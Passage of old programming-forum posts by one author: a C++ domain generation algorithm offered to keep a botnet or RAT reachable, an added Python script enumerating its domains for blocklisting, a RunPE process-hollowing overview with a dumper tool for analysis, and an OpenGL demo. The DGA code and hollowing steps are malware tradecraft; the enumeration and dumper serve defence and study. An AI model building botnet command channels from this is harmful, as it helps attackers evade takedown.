DomainFlux is a way to secure a bot net, web server, HTTP RAT or any other service which could use a domain. It just generates a unique domain for each day, month, year or even hour depending on the algorithm which is used. As an example this generated domain can be used in a bot net. The bot will connect to this domain every time it is executed, and so the master has the possibility to get his bot back if the main address ( which isn't even needed ) gets locked. Of course this is only a very simple example and easy to reverse ( in fact all of them are, it just takes more time if they are more complex ). But I think it is easy to understand how it works ( and not worth the 75$ this guy asks ).

Code:
// Zer0Flag @ drunken-nanomites.org
#include <Windows.h>
#include <string>
#include <time.h>

using namespace std;

// Derives today's "domain" from the date: _strdate_s() yields "MM/DD/YY" and every
// character is XORed with 13 and then increased by 37, so the result changes daily.
string DomainFlux(string sEnd)
{
    char tmpbuf[128];
    _strdate_s(tmpbuf);
    string sDomain = (string)tmpbuf;

    for (size_t i = 0; i < sDomain.length(); i++)
    {
        sDomain[i] ^= 13;
        sDomain[i] += 37;
        // the original also had "sDomain[i] >> 42;" here, an expression without effect
    }
    return sDomain + sEnd;
}

int main(int argc, char** argv)
{
    MessageBoxA(NULL, DomainFlux(".com").c_str(), "New Domain each day....", MB_OK);
    return 0;
}

~Zer0Flag
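The post says such a scheme is easy to reverse, and that is exactly what a defender does with a domain generation algorithm: reimplement it and enumerate the domains for the coming days so they can be blocklisted or sinkholed before the bots resolve them. The example below is added here and is not part of the original post. It reproduces the C++ transform above in Python (the date as `MM/DD/YY` from `_strdate_s`, each character XORed with 13 and then increased by 37) and builds a dated watchlist; it also flags days on which the transform yields characters that are not legal in a hostname, a detail that makes those lookups stand out in DNS logs. The `.com` suffix follows the original; the dates in the usage are chosen for the demonstration.

```python
"""Enumerating DomainFlux domains for a blocklist (added example)."""
import datetime
import re

# One DNS label: letters, digits and inner hyphens, at most 63 characters.
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def flux_label(day):
    """The transform from DomainFlux(): applied to the 'MM/DD/YY' date string."""
    stamp = day.strftime("%m/%d/%y")
    # char arithmetic as in the C++ loop: (c ^ 13) + 37, kept within one byte
    return "".join(chr(((ord(c) ^ 13) + 37) & 0xFF) for c in stamp)


def flux_domain(day, suffix=".com"):
    """Domain the sample would contact on the given day."""
    return flux_label(day) + suffix


def is_valid_label(label):
    """True if the label could actually be registered and resolved."""
    return LABEL_RE.match(label) is not None


def watchlist(start, days, suffix=".com"):
    """(date, domain, resolvable) for `days` consecutive days starting at `start`.

    Digits 4 to 7 map to '^', ']', '`' and '_', none of which is allowed in a
    hostname, so on those days the bot cannot resolve anything; the query is
    still worth alerting on because it is unmistakably this algorithm.
    """
    out = []
    for n in range(days):
        day = start + datetime.timedelta(days=n)
        label = flux_label(day)
        out.append((day, label + suffix, is_valid_label(label)))
    return out


if __name__ == "__main__":
    # The date of the original post, and the following week.
    for day, domain, ok in watchlist(datetime.date(2011, 9, 7), 7):
        print(day.isoformat(), domain, "resolvable" if ok else "invalid hostname")
```

Because the input space is one date string with a fixed format, the whole output for any year fits in a few hundred lines, which is why the post calls this kind of scheme easy to reverse.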

14
C - C++ / [C++] RunPEDumper
« on: September 03, 2011, 02:46:24 pm »
RunPE is a method used mostly in malware to load a binary file from resources and execute it in memory. This is used to bypass heuristics and make it harder to analyse the file. Most RunPEs in the wild work the same way.

- Create a new Process
- Unmap the loaded file from memory to create space for the new one
- Write the new file into memory
- GetThreadContext
- Set new entrypoint
- SetThreadContext
- ResumeThread


The easiest way to dump this is to hook the "WriteProcessMemory" API and redirect the buffer to a new file. I used an ExceptionHooklib from OpCodeZ to do this job. Improvements could be hooking "ResumeThread" to prevent the malware thread from being executed, or hooking the native APIs which could be used instead of the "normal" ones.

How to use this: choose your injector ( in my case the one which I included from -Alex- ) and select "Load+Inject". Then choose your target and select the "AntiMalwareHook.dll". The dumped file appears in the same dir as the target file and is called "dump.exe".

Included in Download:
-Source
-Compiled DLL
-DLL Injector by -Alex-

OriginalSite: Homepage


~Zer0Flag

15
C - C++ / [C]OpenGLDemo.1
« on: September 02, 2011, 11:57:16 pm »
Hey ,

I played a bit with OpenGL and here is the result. It's the first time that I coded with OpenGL, so don't freak out if it's bad :).
http://www.youtube.com/watch?v=MmvviVVdkzE
Code:
//Zer0Flag @ drunken-nanomites.org

#include <Windows.h>
#include <gl/GL.h>
#include <gl/GLU.h>
#include <GL/glut.h>
#include <iostream>
#include <stdlib.h>
#include <time.h>

using namespace std;

// One rotation angle per cube. The full grid is 16 x 16 cubes (Ix, Iy = 0..60 in
// steps of 4), so 256 entries are needed; the original array of 20 was written past its end.
float fRotation[256] = { 0.0f };
float fKoordSize = 60.0f;
float fJump = 0.0f;

time_t ExecutionTime = 0;

void changeSize(int iWidth, int iHeight) {
    if (iHeight <= 0)
    {
        iHeight = 1;
    }

    float ratio = (float)iWidth / (float)iHeight;   // integer division here would give 0 or 1

    glViewport(0, 0, iWidth, iHeight);
    glMatrixMode(GL_PROJECTION);
    glLoadIdentity();
    gluPerspective(45.0f, ratio, 0.1f, 100.0f);
    glMatrixMode(GL_MODELVIEW);
    glLoadIdentity();
}

// Draw one wire cube at (fX, fY, fZ), rotated by fAngle degrees about the (1,1,0) axis.
void drawCube(float fX, float fY, float fZ, float fAngle) {
    glLoadIdentity();
    glEnable(GL_DEPTH_TEST);
    gluLookAt(0.0f, 0.0f, fKoordSize, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f);
    glTranslatef(fX, fY, fZ);
    glRotatef(fAngle, 1.0f, 1.0f, 0.0f);
    glutWireCube(2.0);
}

void renderScene(void) {
    Sleep(50);

    glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);

    time_t CurrentTime = time(NULL);
    long ullCurrentTicks = (long)(CurrentTime - ExecutionTime);

    if (ullCurrentTicks >= 1 && ullCurrentTicks <= 11)
    {
        // Seconds 1..11: a flat grid that grows by one row and one column per second
        // (the original spelled this out as eleven identical switch cases, one per second).
        int iLimit = (int)ullCurrentTicks * 4;
        for (int Ix = 0; Ix <= iLimit; Ix += 4)
        {
            for (int Iy = 0; Iy <= iLimit; Iy += 4)
            {
                drawCube(((fKoordSize/2) - 8) * (-1) + Ix, ((fKoordSize/2) - 8) * (-1) + Iy, 0.0f, 0.0f);
            }
        }
    }
    if (ullCurrentTicks > 11 && ullCurrentTicks <= 32)
    {
        // Seconds 12..32: the full 16 x 16 grid with every cube at a random height.
        // From second 19 on the cubes also rotate, from second 26 on in random colours.
        int i = 0;

        for (int Ix = 0; Ix <= 60; Ix += 4)
        {
            for (int Iy = 0; Iy <= 60; Iy += 4)
            {
                fJump = (float)((rand() % 8) + 1);

                if (ullCurrentTicks > 25)
                {
                    switch ((((rand() % 30) + 10) / 10))
                    {
                    case 1:
                        glColor3f(0.5f, 0.0f, 0.0f);
                        break;
                    case 2:
                        glColor3f(0.0f, 0.5f, 0.0f);
                        break;
                    case 3:
                        glColor3f(0.0f, 0.0f, 0.8f);
                        break;
                    }
                }

                float fAngle = (ullCurrentTicks > 18) ? fRotation[i] : 0.0f;
                drawCube((fKoordSize/2 * (-1)) + Ix, (fKoordSize/2 * (-1)) + Iy, fJump, fAngle);

                if (ullCurrentTicks > 18)
                {
                    fRotation[i] += 1.0f;
                }
                i++;
            }
        }
    }
    // after second 32 nothing is drawn any more
    glutSwapBuffers();
}

void processNormalKeys(unsigned char key, int x, int y) {
    if (key == 27) // Exit on ESC
    {
        exit(0);
    }
}

int main(int argc, char **argv) {

    ExecutionTime = time(NULL);

    glutInit(&argc, argv);
    glutInitDisplayMode(GLUT_DEPTH | GLUT_DOUBLE | GLUT_RGBA);
    glutInitWindowPosition(100, 100);
    glutInitWindowSize(320, 320);
    glutCreateWindow("OpenGL Tests");

    glutDisplayFunc(renderScene);
    glutReshapeFunc(changeSize);
    glutIdleFunc(renderScene);

    glutKeyboardFunc(processNormalKeys);

    glutMainLoop();
    return 0;
}
~0
